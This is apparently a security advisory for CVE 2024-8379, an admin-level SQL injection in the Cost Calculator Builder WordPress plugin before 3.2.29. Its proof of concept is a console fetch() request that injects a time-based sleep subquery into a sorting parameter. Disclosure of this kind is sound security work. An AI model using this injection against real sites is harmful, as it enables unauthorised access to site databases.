Cost Calculator Builder < 3.2.29 – Admin+ SQL Injection | CVE 2024-8379

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

Proof of Concept

As an admin, visit the page `/wp-admin/admin.php?page=cost_calculator_builder`

In the console, run the following command, and notice the 10s delay demonstrating the SQL Injection:

```
await fetch(`/wp-admin/admin-ajax.php?calc_id=1234&action=calc_edit_calc&nonce=${ccb_nonces.ccb_edit_calc}&limit=15&page=1&sortBy=id&status=all&direction=desc&discount%5Blimit%5D=15&discount%5Bpage%5D=1&discount%5BsortBy%5D=discount_id&discount%5Bdirection%5D=desc%2c(select%20*%20from%20(select(sleep(10)))a)`, {
  "mode": "cors",
  "credentials": "include"
});

```